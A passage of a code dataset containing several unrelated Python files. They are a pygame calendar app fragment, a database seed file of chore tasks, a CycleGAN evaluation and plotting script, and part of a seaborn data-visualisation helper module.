self.drawText([\"\",\"\",\"\",\"\"],screen,self.mainEvent2[0],self.mainEvent2[1],100,70)\n self.drawEventBtn(screen,self.mainEvent3[4],self.mainEvent3[:4])\n self.drawText([\"\",\"\",\"\",\"\"],screen,self.mainEvent3[0],self.mainEvent3[1],100,70)\n\n self.drawComBtn(screen)\n self.drawCalBtn(screen)\n screen.blit(self.oImg,(235,715))\n self.drawSettingBtn(screen)\n \n def redrawThreeIcon(self,screen):\n if self.mode == \"threeIcon\":\n screen.fill(self.grey)\n self.displayText(screen,\"New Events\", 200,80,0,0,self.white,self.topicFont)\n self.drawMainBtn(screen)\n self.drawEventBtn(screen,self.mainEvent1[4],self.mainEvent1[:4])\n self.drawText([\"\",\"\",\"\",\"\"],screen,self.mainEvent1[0],self.mainEvent1[1],100,70)\n self.drawEventBtn(screen,self.mainEvent2[4],self.mainEvent2[:4])\n self.drawText([\"\",\"\",\"\",\"\"],screen,self.mainEvent2[0],self.mainEvent2[1],100,70)\n self.drawEventBtn(screen,self.mainEvent3[4],self.mainEvent3[:4])\n self.drawText([\"\",\"\",\"\",\"\"],screen,self.mainEvent3[0],self.mainEvent3[1],100,70)\n\n self.drawComBtn(screen)\n self.drawCalBtn(screen)\n screen.blit(self.oImg,(235,715))\n self.drawThreeIcon(screen)\n\n def redrawHand(self,screen):\n if self.mode==\"hand\":\n self.drawSubpage(screen)\n self.drawInputBox(screen)\n self.drawInputBoxText(screen)\n screen.blit(self.doneImg,(518-50,0))\n \n \n def redrawLibraryInput(self,screen):\n if self.mode == \"libraryInput\":\n self.drawSubpage(screen)\n pygame.draw.circle(screen,self.importButtons[0],(268,500),200)\n self.displayText(screen,\"Input\",68,300,400,400,self.white,self.topicFont)\n \n\n \n def redrawCalendar(self,screen):\n if self.mode == \"calendar\":\n self.calendarApril(screen)\n for i in range(5):\n for j in range(7):\n if self.day[i][j] >= 1:\n pygame.draw.circle(screen,self.black,(250 + j *70-223+30, 130 + i * 70+100+60),10)\n \n def redrawCalendarMarch(self,screen):\n if self.mode == \"calendarMarch\":\n self.calendarMarch(screen)\n \n def redrawCalendarMay(self,screen):\n if self.mode == \"calendarMay\":\n self.calendarMay(screen)\n \n def redrawWorking(self,screen):\n if self.mode == \"working\":\n self.displayText(screen,\"Working...\",100,300,100,-70,self.black,self.cuteFont)\n pygame.draw.rect(screen,self.white,(100,300,350,50))\n pygame.draw.rect(screen,self.black,(100,300,self.w,50))\n if self.num == 0:\n self.drawOrangeBtn(screen,(30,600))\n self.drawOrangeBtn(screen,(130,600))\n self.drawOrangeBtn(screen,(230,600))\n self.drawOrangeBtn(screen,(330,600))\n self.drawOrangeBtn(screen,(430,600))\n if self.num == 1:\n self.drawOrangeBtn(screen,(30,600+self.h1))\n self.drawOrangeBtn(screen,(130,600))\n self.drawOrangeBtn(screen,(230,600))\n self.drawOrangeBtn(screen,(330,600))\n self.drawOrangeBtn(screen,(430,600))\n elif self.num == 2:\n self.drawOrangeBtn(screen,(30,600))\n self.drawOrangeBtn(screen,(130,600+self.h2))\n self.drawOrangeBtn(screen,(230,600))\n self.drawOrangeBtn(screen,(330,600))\n self.drawOrangeBtn(screen,(430,600))\n elif self.num == 3:\n self.drawOrangeBtn(screen,(30,600))\n self.drawOrangeBtn(screen,(130,600))\n self.drawOrangeBtn(screen,(230,600+self.h3))\n self.drawOrangeBtn(screen,(330,600))\n self.drawOrangeBtn(screen,(430,600))\n elif self.num == 4:\n self.drawOrangeBtn(screen,(30,600))\n self.drawOrangeBtn(screen,(130,600))\n self.drawOrangeBtn(screen,(230,600))\n self.drawOrangeBtn(screen,(330,600+self.h4))\n self.drawOrangeBtn(screen,(430,600))\n elif self.num == 5:\n self.drawOrangeBtn(screen,(30,600))\n self.drawOrangeBtn(screen,(130,600))\n self.drawOrangeBtn(screen,(230,600))\n self.drawOrangeBtn(screen,(330,600))\n self.drawOrangeBtn(screen,(430,600+self.h5))\n \n \n def redrawFinish(self,screen):\n if self.mode == \"finish\":\n self.numList = []\n self.drawSubpage(screen)\n self.displayText(screen,\"Done!\",50,200,430,300,self.orange,self.cuteFont)\n screen.blit(self.oImg,(180,400))\n \n def redrawCalendarYes(self,screen):\n \n if self.mode == \"calendarYes\":\n self.calendarYes(screen)\n drawText(self,[\"THE REVOLUTION\",\"APRIL 27\",\"\",\"FT.LAUDERDALE,FLORIDA\"],screen,self.mainEvent1[0],self.mainEvent1[1])\n getDateList=self.getDate()\n print(getDateList)\n if len(getDateList) > 2:\n self.drawEventBtn(screen,self.mainEven2[4],self.mainEvent2[:4])\n self.drawText(self,[self.getDate()[0],self.getDate()[1],self.getDate()[3],self.getDate()[2]],screen,self.mainEvent2[0],self.mainEvent2[1])\n else:\n self.drawEventBtn(screen,self.mainEven2[4],self.mainEvent2[:4])\n self.drawText(self,[self.getDate()[0],self.getDate()[1],self.getDate()[3],self.getDate()[2]],screen,self.mainEvent2[0],self.mainEvent2[1])\n self.drawEventBtn(screen,self.mainEven3[4],self.mainEvent3[:4])\n self.drawText(self,[self.getDate()[0],self.getDate()[1],self.getDate()[3],self.getDate()[2]],screen,self.mainEvent3[0],self.mainEvent3[1])\n \n \n def redrawCalendarNo(self,screen):\n if self.mode == \"calendarNo\":\n self.calendarNo(screen)\n \n def redrawCommunity(self,screen):\n if self.mode == \"community\":\n self.drawSubpage(screen)\n pygame.draw.rect(screen,self.friendEventBtn[4],self.friendEventBtn[:4])\n self.displayText(screen,\"Friends' Event\",self.friendEventBtn[0],\n self.friendEventBtn[1],300,200,self.black,self.cuteFont)\n pygame.draw.rect(screen,self.localEventBtn[4],self.localEventBtn[:4])\n self.displayText(screen,\"Local Event\",self.localEventBtn[0],\n self.localEventBtn[1],300,200,self.black,self.cuteFont)\n self.displayText(screen,\"OR\",100,550,200,100,self.black,self.cuteFont)\n self.drawSearchBtn(screen,(400,700))\n \n def redrawCommunityFriends(self,screen):\n if self.mode == \"communityFriends\":\n self.drawCommunityFriends(screen)\n \n\n \n def redrawAll(self, screen):\n self.redrawSign(screen)\n self.redrawInterest(screen)\n self.redrawMain(screen)\n self.redrawLibraryInput(screen)\n self.redrawCalendar(screen)\n self.redrawWorking(screen)\n self.redrawFinish(screen)\n self.redrawCalendarYes(screen)\n self.redrawCalendarNo(screen)\n self.redrawCalendarMarch(screen)\n self.redrawCalendarMay(screen)\n self.redrawCommunity(screen)\n self.redrawCommunityFriends(screen)\n self.redrawThreeIcon(screen)\n self.redrawHand(screen)\n \n\n def isKeyPressed(self, key):\n ''' return whether a specific key is being held '''\n return self._keys.get(key, False)\n\n def __init__(self, width=536, height=819, fps=50, title=\"BlackOrange\"):\n self.width = width\n self.height = height\n self.fps = fps\n self.title = title\n self.bgColor = (99,99,112)\n\n pygame.init()\n \n\n def run(self):\n clock = pygame.time.Clock()\n screen = pygame.display.set_mode((self.width, self.height))\n # set the title of the window\n pygame.display.set_caption(self.title)\n\n # stores all the keys currently being held down\n self._keys = dict()\n\n # call game-specific initialization\n self.init()\n\n playing = True\n while playing:\n time = clock.tick(self.fps)\n self.timerFired(time)\n for event in pygame.event.get():\n if event.type == pygame.MOUSEBUTTONDOWN and event.button == 1:\n self.mousePressed(*(event.pos))\n print(event.pos)\n self.currentPos=event.pos\n elif event.type == pygame.MOUSEBUTTONUP and event.button == 1:\n self.mouseReleased(*(event.pos))\n elif (event.type == pygame.MOUSEMOTION and\n event.buttons == (0, 0, 0)):\n self.mouseMotion(*(event.pos))\n # elif (event.type == pygame.MOUSEMOTION and\n # event.buttons[0] == 1):\n # self.mouseDrag(*(event.pos))\n elif event.type == pygame.KEYDOWN:\n self._keys[event.key] = True\n self.keyPressed(event.key, event.mod,self.currentPos)\n elif event.type == pygame.KEYUP:\n self._keys[event.key] = False\n self.keyReleased(event.key, event.mod)\n elif event.type == pygame.QUIT:\n playing = False\n screen.fill(self.bgColor)\n self.redrawAll(screen)\n pygame.display.flip()\n\n pygame.quit()\n\ndef main():\n game = PygameGame(536,819)\n game.run()\n\nif __name__ == '__main__':\n main()","sub_path":"Hack112.py","file_name":"Hack112.py","file_ext":"py","file_size_in_byte":51779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"612916715","text":"from app.models import db, Task\n\n\n# Adds a demo user, you can add other users here if you want\ndef seed_tasks():\n\n data = [\n Task(taskName = \"Clean the shower\", taskBody = \"Use scrubbing bubbles to remove soap scum.\", dueDate = \"05/03/2021\", completed = False, assignedUserId = 1, projectId = 1),\n Task(taskName = \"Clean the toilet\", taskBody = \"\", dueDate = \"05/03/2021\", completed = False, assignedUserId = 2, projectId = 1),\n Task(taskName = \"Clean Sink\", taskBody = \"\", dueDate = \"05/03/2021\", completed = False, assignedUserId = 3, projectId = 1),\n Task(taskName = \"Wipe counters down\", taskBody = \"Clean counters using disinfectant\", dueDate = \"05/03/2021\", completed = False, assignedUserId = 3, projectId = 2),\n Task(taskName = \"Clean the oven\", taskBody = \"\", dueDate = \"05/03/2021\", completed = False, assignedUserId = 2, projectId = 2),\n Task(taskName = \"Wash the dishes\", taskBody = \"Load dishes into the dish washer.\", dueDate = \"05/03/2021\", completed = False, assignedUserId = 1, projectId = 2),\n Task(taskName = \"Sort and Wash clothes\", taskBody = \"Seperate darks and lights\", dueDate = \"05/03/2021\", completed = False, assignedUserId = 4, projectId = 3),\n Task(taskName = \"Dry the clothes\", taskBody = \"\", dueDate = \"05/03/2021\", completed = False, assignedUserId = 5, projectId = 3),\n Task(taskName = \"Fold the clothes\", taskBody = \"\", dueDate = \"05/03/2021\", completed = False, assignedUserId = 6, projectId = 3),\n Task(taskName = \"Cut the grass\", taskBody = \"Use scissors to cut grass for precision cut.\", dueDate = \"05/03/2021\", completed = False, assignedUserId = 5, projectId = 4),\n Task(taskName = \"Rake up the leaves\", taskBody = \"\", dueDate = \"05/03/2021\", completed = False, assignedUserId = 5, projectId = 4),\n Task(taskName = \"Pick up crabapples\", taskBody = \"\", dueDate = \"05/03/2021\", completed = False, assignedUserId = 4, projectId = 4),\n\n ]\n for task in data:\n db.session.add(task)\n db.session.commit()\n\n\n# Uses a raw SQL query to TRUNCATE the users table.\n# SQLAlchemy doesn't have a built in function to do this\n# TRUNCATE Removes all the data from the table, and resets\n# the auto incrementing primary key\ndef undo_tasks():\n db.session.execute('TRUNCATE tasks RESTART IDENTITY CASCADE;')\n db.session.commit()\n","sub_path":"app/seeds/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":2412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"450863385","text":"import tensorflow as tf\nfrom model import CycleGAN\nfrom data_reader import get_source_batch, get_target_batch,get_single_img\nfrom datetime import datetime\nimport os\nimport logging\nimport cv2\nfrom utils import ImagePool\nimport fuzzy\nimport numpy as np\nimport random\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import roc_curve,auc\nfrom sklearn.manifold import TSNE\nfrom sklearn.decomposition import PCA\nfrom compute_accuracy import computeAccuracy\nfrom plot_til.plot_func import plot_fake_xy,plot_conv_output,generate_occluded_imageset,draw_heatmap\nfrom plot_til import utils\nfrom fuzzy import cal_U\nimport matplotlib.cm as cm\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = '1'\n\nFLAGS = tf.flags.FLAGS\n\ntf.flags.DEFINE_integer('batch_size', 1, 'batch size, default: 1')\ntf.flags.DEFINE_integer('image_size', 256, 'image size, default: 256')\ntf.flags.DEFINE_bool('use_lsgan', True,\n 'use lsgan (mean squared error) or cross entropy loss, default: True')\ntf.flags.DEFINE_string('norm', 'instance',\n '[instance, batch] use instance norm or batch norm, default: instance')\ntf.flags.DEFINE_integer('lambda1', 10,\n 'weight for forward cycle loss (X->Y->X), default: 10')\ntf.flags.DEFINE_integer('lambda2', 10,\n 'weight for backward cycle loss (Y->X->Y), default: 10')\ntf.flags.DEFINE_float('learning_rate', 2e-4, # 2e-4\n 'initial learning rate for Adam, default: 0.0002')\ntf.flags.DEFINE_float('learning_rate2', 2e-6, # 2e-6\n 'initial learning rate for Adam, default: 0.000002')\ntf.flags.DEFINE_float('beta1', 0.5,\n 'momentum term of Adam, default: 0.5')\ntf.flags.DEFINE_float('pool_size', 50,\n 'size of image buffer that stores previously generated images, default: 50')\ntf.flags.DEFINE_integer('ngf', 64,\n 'number of gen filters in first conv layer, default: 64')\ntf.flags.DEFINE_string('X', '/home/root123/data/datasets/source/',\n 'X tfrecords file for training, default: data/tfrecords/apple.tfrecords')\ntf.flags.DEFINE_string('Y', '/home/root123/data/datasets/target/toxo40/',\n 'Y tfrecords file for training, default: data/tfrecords/orange.tfrecords')\ntf.flags.DEFINE_string('load_model', '20190508-2326/max',\n 'folder of saved model that you wish to continue training (e.g. 20170602-1936), default: None')\ntf.flags.DEFINE_string('UC_name', \"crescent\",\n 'name of the source data, default: None')\n\nUx = Uy = Cx = Cy = None\n\nx_img_path='/home/root123/data/datasets/source/banana/train/0_000004.jpg'\nx_name=x_img_path.split('/')[-1].split('.')[0]\ny_img_path='/home/root123/data/FCGAN/data/'\ny_name=y_img_path.split('/')[-1].split('.')[0]\n\ndef train():\n if FLAGS.load_model is not None:\n checkpoints_dir = \"checkpoints/\" + FLAGS.load_model.lstrip(\"checkpoints/\")\n print(checkpoints_dir)\n else:\n logging.info('No model to test, stopped!')\n return\n\n graph = tf.Graph()\n with graph.as_default():\n cycle_gan = CycleGAN(\n batch_size=FLAGS.batch_size,\n image_size=FLAGS.image_size,\n use_lsgan=FLAGS.use_lsgan,\n norm=FLAGS.norm,\n lambda1=FLAGS.lambda1,\n lambda2=FLAGS.lambda2,\n learning_rate=FLAGS.learning_rate,\n learning_rate2=FLAGS.learning_rate2,\n beta1=FLAGS.beta1,\n ngf=FLAGS.ngf\n )\n G_loss, D_Y_loss, F_loss, D_X_loss, fake_y, fake_x, Disperse_loss, Fuzzy_loss, feature_x, feature_y = cycle_gan.model()\n\n summary_op = tf.summary.merge_all()\n train_writer = tf.summary.FileWriter(checkpoints_dir, graph)\n saver = tf.train.Saver()\n logging.info('Network Built!')\n\n with tf.Session(graph=graph) as sess:\n checkpoint = tf.train.get_checkpoint_state(checkpoints_dir)\n meta_graph_path = checkpoint.model_checkpoint_path + \".meta\"\n restore = tf.train.import_meta_graph(meta_graph_path)\n restore.restore(sess, tf.train.latest_checkpoint(checkpoints_dir))\n step = int(meta_graph_path.split(\"-\")[2].split(\".\")[0])\n Ux = np.loadtxt(checkpoints_dir + \"/Ux\" + FLAGS.UC_name + '.txt', delimiter=\",\")\n Ux = [[x] for x in Ux]\n Uy = np.loadtxt(checkpoints_dir + \"/Uy\" + FLAGS.UC_name + '.txt', delimiter=\",\")\n Cx = np.loadtxt(checkpoints_dir + \"/Cx\" + FLAGS.UC_name + '.txt', delimiter=\",\")\n Cx = [Cx]\n Cy = np.loadtxt(checkpoints_dir + \"/Cy\" + FLAGS.UC_name + '.txt', delimiter=\",\")\n logging.info('Parameter Initialized!')\n\n #print('Ux',Ux)\n\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(sess=sess, coord=coord)\n\n try:\n plots_count=10\n tsne_plot_count=1000\n result_dir='./result'\n fake_dir=os.path.join(result_dir,'fake_xy')\n roc_dir=os.path.join(result_dir,'roc_curves')\n plot_dir=os.path.join(result_dir,'tsne_pca')\n conv_dir=os.path.join(result_dir,'convs')\n #occ_dir=os.path.join(result_dir,'occ_test')\n #utils.prepare_dir(occ_dir)\n\n x_path = FLAGS.X + FLAGS.UC_name\n x_images, x_id_list, x_len, x_labels, oimg_xs, x_files = get_source_batch(0, 256, 256,\n source_dir=x_path)\n y_images, y_id_list, y_len, y_labels, oimg_ys, y_files = get_target_batch(0, 256, 256,\n target_dir=FLAGS.Y)\n #Compute Accuracy, tp, tn, fp, fn, f1_score, recall, precision, specificity#\n accuracy, tp, tn, fp, fn, f1_score, recall, precision, specificity=computeAccuracy(Uy,y_labels)\n print(\"accuracy:%.4f\\ttp:%d\\ttn:%d\\tfp %d\\tfn:%d\\tf1_score:%.3f\\trecall:%.3f\\tprecision:%.3f\\tspecicity:%.3f\\t\" %\n (accuracy, tp, tn, fp, fn,f1_score, recall, precision, specificity))\n #cv2.imshow('201',oimg_ys[201])\n #cv 2.waitKey()\n #draw ROC curves\n '''\n print('y_labels:',np.shape(y_labels))\n print('y_scores:',np.shape(Uy[:,0]))\n fpr,tpr,thresholds=roc_curve(y_labels,Uy[:,1])\n roc_auc=auc(fpr,tpr)\n plt.plot(fpr, tpr)\n plt.xticks(np.arange(0, 1, 0.1))\n plt.yticks(np.arange(0, 1, 0.1))\n plt.xlabel(\"False Positive Rate\")\n plt.ylabel(\"True Positive Rate\")\n # plt.title(\"A simple plot\")\n plt.show()\n print('fpr:',np.shape(fpr))\n print('tpr:', np.shape(tpr))\n print('thresholds:', np.shape(thresholds))\n '''\n # t-SNE and PCA plots#\n for j in range(plots_count):\n feature_path=os.path.join(checkpoints_dir,'feature_fcgan.npy')\n feature=np.load(feature_path)\n print('feature:',len(feature))\n randIdx = random.sample(range(0, len(y_labels)), tsne_plot_count)\n t_features = []\n t_labels = []\n for i in range(len(randIdx)):\n t_features.append(feature[randIdx[i]])\n t_labels.append(y_labels[randIdx[i]])\n # 使用TSNE进行降维处理。从100维降至2维。\n tsne = TSNE(n_components=2, learning_rate=100).fit_transform(t_features)\n #pca = PCA().fit_transform(t_features)\n #设置画布大小\n plt.figure(figsize=(6, 6))\n #plt.subplot(121)\n plt.scatter(tsne[:, 0], tsne[:, 1], c=t_labels)\n #plt.subplot(122)\n #plt.scatter(pca[:, 0], pca[:, 1], c=t_labels)\n plt.colorbar() # 使用这一句就可以分辨出,颜色对应的类了!神奇啊。\n utils.prepare_dir(plot_dir)\n plt.savefig(os.path.join(plot_dir,'plot{}.pdf'.format(j)))\n\n\n for i in range(10):\n #if True:\n #Cross Domain Image Generation#\n\n x_img,_,x_oimg = get_single_img(x_img_path)\n y_path=os.path.join(y_img_path,str(i+1)+'.jpg')\n y_img,_,y_oimg=get_single_img(y_path)\n fake_y_eval,fake_x_eval, conv_y_eval = sess.run(\n [fake_y, fake_x, tf.get_collection('conv_output')],\n feed_dict={cycle_gan.x: x_img, cycle_gan.y: y_img})\n #print(np.shape(fake_y_eval))\n #print(np.shape(fake_x_eval))\n #print(np.shape(conv_y_eval))\n plot_fake_xy(fake_y_eval[0], fake_x_eval[0], x_name, str(i+1), x_oimg,y_oimg,fake_dir)\n print('processing:',i)\n\n #Feature Map Visualization#\n\n print('conv_len:', len(conv_y_eval))\n print('conv_shape:',np.shape(conv_y_eval[0]))\n id_y_dir=os.path.join(conv_dir, str(y_name))\n #utils.prepare_dir()\n for i, c in enumerate(conv_y_eval):\n #conv_i_dir=os.path.join(id_y_dir,'_layer_'+str(i))\n plot_conv_output(c,i,id_y_dir)\n #print(os.path.join(id_y_dir, 'y.png'))\n cv2.imwrite(os.path.join(id_y_dir, 'y.png'), y_oimg)\n\n #Occlusion Test#\n '''\n if True:\n t_imgs, t_lbs, t_img = get_single_img(t_img_path)\n #s_imgs, s_lbs, t_img = get_single_img(s_img_path)\n width=np.shape(t_imgs[0])[0]\n height=np.shape(t_imgs[0])[1]\n #print('width:',width)\n #print('height:', height)\n data=generate_occluded_imageset(t_imgs[0],width=width,height=height,occluded_size=16)\n #print(data.shape[0])\n #print('Cy:',Cy)\n u_ys=np.empty([data.shape[0]],dtype='float64')\n occ_map=np.empty((width,height),dtype='float64')\n print(occ_map.shape)\n cnt=0\n feature_y_eval = sess.run(\n feature_y,\n feed_dict={cycle_gan.y: [data[0]]})\n # print(feature_y_eval)\n idx_u = 0\n u_y0 = cal_U(feature_y_eval[0], Cy, 2, 2)[idx_u]\n occ_value=0\n print('u_y0:',u_y0)\n for i in range(width):\n print('collum idx:',i)\n print(str(cnt) + ':' + str(occ_value))\n for j in range(height):\n feature_y_eval = sess.run(\n feature_y,\n feed_dict={cycle_gan.y: [data[cnt+1]]})\n # print(feature_y_eval)\n u_y = cal_U(feature_y_eval[0], Cy, 2, 2)[idx_u]\n #print('u_y0:', u_y0)\n #print('u_y:',u_y)\n occ_value=u_y0-u_y\n occ_map[i,j]=occ_value\n #print(str(cnt)+':'+str(occ_value))\n cnt+=1\n\n occ_map_path=os.path.join(occ_dir,'occlusion_map.txt')\n np.savetxt(occ_map_path, occ_map, fmt='%0.20f')\n cv2.imwrite(os.path.join(occ_dir, 'occ_test.png'), oimg_ys[id_y])\n draw_heatmap(occ_map_path=occ_map_path,ori_img=t_img,save_dir=os.path.join(occ_dir,'heatmap.png'))\n '''\n\n\n except KeyboardInterrupt:\n logging.info('Interrupted')\n coord.request_stop()\n except Exception as e:\n coord.request_stop(e)\n finally:\n #save_path = saver.save(sess, checkpoints_dir + \"/model.ckpt\", global_step=step)\n #np.savetxt(checkpoints_dir + \"/Uy\" + FLAGS.UC_name + '.txt', Uy, fmt=\"%.20f\", delimiter=\",\")\n #np.savetxt(checkpoints_dir + \"/Cy\" + FLAGS.UC_name + '.txt', Cy, fmt=\"%.20f\", delimiter=\",\")\n #np.savetxt(checkpoints_dir + \"/Ux\" + FLAGS.UC_name + '.txt', Ux, fmt=\"%.20f\", delimiter=\",\")\n #np.savetxt(checkpoints_dir + \"/Cx\" + FLAGS.UC_name + '.txt', Cx, fmt=\"%.20f\", delimiter=\",\")\n logging.info(\"stopped\")\n # When done, ask the threads to stop.\n coord.request_stop()\n coord.join(threads)\n\n\ndef main(unused_argv):\n train()\n\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.INFO)\n tf.app.run()\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":12547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"582638488","text":"import matplotlib.pyplot as plt\nimport seaborn as sns\nimport numpy as np\nfrom matplotlib.gridspec import GridSpec, GridSpecFromSubplotSpec\nfrom scipy.stats import norm\nfrom sklearn.decomposition import PCA\nimport plotly.express as px\n\ncust_palt = ['#111d5e','#c70039','#37b448','#B43757', '#ffbd69', '#ffc93c','#FFFF33','#FFFACD',]\n\n#指定列のカテゴリカルな特徴量のヒストグラムをtrain, testの順に並べる。\n#in :train data, testdata, visualizing column name\n#out :-\ndef histCategory(dfTrain, clmnNm, dfTest=None):\n figure = plt.figure(figsize=(12, 4))\n gs_master = GridSpec(nrows=1, ncols=2, figure=figure)\n \n ax1 = figure.add_subplot(gs_master[0, 0])\n ax1.set_title(\"Train \" + clmnNm,weight='bold')\n sns.countplot(x=clmnNm,\n data=dfTrain,\n ax=ax1,\n order=dfTrain[clmnNm].value_counts().index)\n total = float(len(dfTrain[clmnNm]))\n for p in ax1.patches:\n ax1.text(p.get_x() + p.get_width() / 2., #width(x) :get_xは棒グラフの左端の位置\n p.get_height() + 2, #height(y)\n '{:1.2f}%'.format((p.get_height() / total) * 100),\n ha='center')\n \n \n if dfTest is not None:\n ax2 = figure.add_subplot(gs_master[0, 1])\n ax2.set_title(\"Test \" + clmnNm,weight='bold')\n sns.countplot(x=clmnNm,\n data=dfTest,\n ax=ax2,\n order=dfTest[clmnNm].value_counts().index)\n total = float(len(dfTest[clmnNm]))\n for p in ax2.patches:\n ax2.text(p.get_x() + p.get_width() / 2., #width(x) :get_xは棒グラフの左端の位置\n p.get_height() + 2, #height(y)\n '{:1.2f}%'.format((p.get_height() / total) * 100),\n ha='center')\n \n return\n\n\n\n# Index付き1次元データフレームのヒストグラム表現(横向き)\ndef histCntHorizontal(cntWithIdx):\n fig = plt.figure(figsize=(20,15))\n sns.barplot(y = cntWithIdx.reset_index()[\"index\"].astype(str), x = cntWithIdx.values)\n plt.show()\n return\n\n\n\n# Index付き1次元データフレームのヒストグラム表現(縦向き)\ndef histCntVertical(cntWithIdx):\n fig = plt.figure(figsize=(20,10))\n sns.barplot(x = cntWithIdx.reset_index()[\"index\"].astype(str), y = cntWithIdx.values)\n plt.show()\n return\n\n\n\n# 1次元データフレームのカーネル密度推定法(KDE)による分布表現\ndef distKde(distDf):\n fig = plt.figure(figsize=(20,10))\n sns.kdeplot(distDf.values.reshape(1, len(distDf))[0], shade=True)\n plt.show()\n return\n\n\n\n#meta情報(mean, median, min, max, std, variance, skew(歪度), kurtosis(尖度))の分布\n#train, testのメタ情報の差異を調べる\ndef metaDist(dfTrain, dfTest):\n fig = plt.figure(constrained_layout=True, figsize=(20, 16))\n grid = GridSpec(ncols=4, nrows=4, figure=fig)\n \n ax1 = fig.add_subplot(grid[0, :2])\n ax1.set_title('Distribution of Mean Values per Column', weight='bold')\n sns.kdeplot(dfTrain.mean(axis=0),color=cust_palt[0], shade=True, label='Train')\n sns.kdeplot(dfTest.mean(axis=0),color=cust_palt[1], shade=True, label='Test')\n \n ax2 = fig.add_subplot(grid[0, 2:])\n ax2.set_title('Distribution of Median Values per Column', weight='bold')\n sns.kdeplot(dfTrain.median(axis=0),color=cust_palt[0], shade=True, label='Train')\n sns.kdeplot(dfTest.median(axis=0),color=cust_palt[1], shade=True, label='Test')\n \n ax3 = fig.add_subplot(grid[1, :2])\n ax3.set_title('Distribution of Minimum Values per Column', weight='bold')\n sns.kdeplot(dfTrain.min(axis=0),color=cust_palt[0], shade=True, label='Train')\n sns.kdeplot(dfTest.min(axis=0),color=cust_palt[1], shade=True, label='Test')\n \n ax4 = fig.add_subplot(grid[1, 2:])\n ax4.set_title('Distribution of Maximum Values per Column', weight='bold')\n sns.kdeplot(dfTrain.max(axis=0),color=cust_palt[0], shade=True, label='Train')\n sns.kdeplot(dfTest.max(axis=0),color=cust_palt[1], shade=True, label='Test')\n \n ax5 = fig.add_subplot(grid[2, :2])\n ax5.set_title('Distribution of Std\\'s per Column', weight='bold')\n sns.kdeplot(dfTrain.std(axis=0),color=cust_palt[0], shade=True, label='Train')\n sns.kdeplot(dfTest.std(axis=0),color=cust_palt[1], shade=True, label='Test')\n \n ax6 = fig.add_subplot(grid[2, 2:])\n ax6.set_title('Distribution of Variances per Column', weight='bold')\n sns.kdeplot(dfTrain.var(axis=0),color=cust_palt[0], shade=True, label='Train')\n sns.kdeplot(dfTest.var(axis=0),color=cust_palt[1], shade=True, label='Test')\n \n ax7 = fig.add_subplot(grid[3, :2])\n ax7.set_title('Distribution of Skew Values per Column', weight='bold')\n sns.kdeplot(dfTrain.skew(axis=0),color=cust_palt[0], shade=True, label='Train')\n sns.kdeplot(dfTest.skew(axis=0),color=cust_palt[1], shade=True, label='Test')\n \n ax8 = fig.add_subplot(grid[3, 2:])\n ax8.set_title('Distribution of Kurtosis Values per Column', weight='bold')\n sns.kdeplot(dfTrain.kurtosis(axis=0),color=cust_palt[0], shade=True, label='Train')\n sns.kdeplot(dfTest.kurtosis(axis=0),color=cust_palt[1], shade=True, label='Test')\n \n plt.suptitle('Meta Distributions of Train/Test Set', fontsize=25, weight='bold')\n plt.show()\n \n return\n\n\n\n#dfのFeatureごとの分布図を表示。\n#オプションでdf2(test data)も並べられる。\n#rows×columnsをdfのfeature数に合わせること。\ndef featDist(df, cols, rows=3, columns=3, figsize=(30,25), title=None, dfOpt=None):\n \n fig, axes = plt.subplots(rows, columns, figsize=figsize, constrained_layout=True)\n axes = axes.flatten()\n\n for i, j in zip(cols, axes):\n sns.distplot(\n df[i],\n ax=j,\n hist=False,\n #color='#111d5e',\n label=f'Train {i}',\n kde_kws={'alpha':0.9}) \n \n if dfOpt is not None:\n sns.distplot(\n dfOpt[i],\n ax=j,\n hist=False,\n color = '#c70039',\n label=f'Test {i}',\n kde_kws={'alpha':0.7})\n \n j.set_title('Train Test Dist of {0}'.format(i.capitalize()), weight='bold')\n fig.suptitle(f'{title}', fontsize=24, weight='bold')\n\n return\n\n\n\n#dfの分布図と最尤法でfittingした正規分布を同時に表示。差異を調べる。\n#オプションでdf2(test data)も並べられる。\n#rows×columnsをdfのfeature数に合わせること。\n#範囲を設定する場合はdomain = [xmin, xmax, ymin, ymax] を設定すること\ndef featDistNorm(df, cols, rows=3, columns=3, figsize=(30,25), title=None, dfOpt=None, domain=None):\n \n fig, axes = plt.subplots(rows, columns, figsize=figsize, constrained_layout=True)\n axes = axes.flatten()\n\n for i, j in zip(cols, axes):\n sns.distplot(\n df[i],\n ax=j,\n fit=norm,\n hist=False,\n #color='#111d5e',\n label=f'Train {i}',\n kde_kws={'alpha':0.9}) \n \n if dfOpt is not None:\n sns.distplot(\n dfOpt[i],\n ax=j,\n hist=False,\n color = '#c70039',\n label=f'Test {i}',\n kde_kws={'alpha':0.7})\n \n if domain is not None:\n j.axis(domain)\n \n (mu, sigma) = norm.fit(df[i])\n j.set_title('Train Test Dist of {0} Norm Fit: $\\mu=${1:.2g}, $\\sigma=${2:.2f}'.format(i.capitalize(), mu, sigma), weight='bold')\n fig.suptitle(f'{title}', fontsize=24, weight='bold')\n \n return\n\n\n#相関関係のヒートマップを表示\n#in: df.corr()で作られたデータフレーム\ndef corrHeatMap(correlation):\n mask = np.triu(correlation)\n plt.figure(figsize=(30, 12))\n sns.heatmap(correlation,\n mask=mask,\n annot=True,\n fmt='.3f',\n cmap='Wistia',\n linewidths=0.05,\n cbar=True)\n \n \n plt.title('Features with Highest Correlations', weight='bold')\n plt.show()\n return\n\n\n\n#PCAによるデータの次元削減\n#PCA結果のパレート図\n#in :dfTrain, dfTest, Rank:上位何位まで見せるか(barの数)\ndef parateResultPCA(dfTrain, dfTest, Rank=None):\n #主成分解析によるベクトル変換\n pca = PCA()\n pca.fit(dfTrain.iloc[:,1:])\n pcaTrain = pca.transform(dfTrain.iloc[:,1:])\n pcaTest = pca.transform(dfTest.iloc[:,1:])\n \n #パレート図\n fig, ax = plt.subplots(1,1,figsize=(30, 12))\n 